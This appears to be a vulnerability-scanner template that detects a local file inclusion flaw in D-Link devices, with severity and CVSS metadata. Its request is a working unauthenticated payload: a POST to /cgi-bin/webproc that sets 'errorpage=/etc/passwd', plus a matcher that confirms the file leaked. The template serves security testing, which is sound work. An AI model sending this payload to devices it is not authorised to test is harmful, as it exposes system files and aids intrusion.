id: dlink-file-read info: name: D-Link - Local File Inclusion author: dhiyaneshDK severity: high description: D-Link is vulnerable to local file inclusion. reference: - https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 tags: dlink,lfi http: - method: POST path: - "{{BaseURL}}/cgi-bin/webproc" body: 'errorpage=/etc/passwd&obj-action=auth&:action=login' matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 # Enhanced by mp on 2022/08/03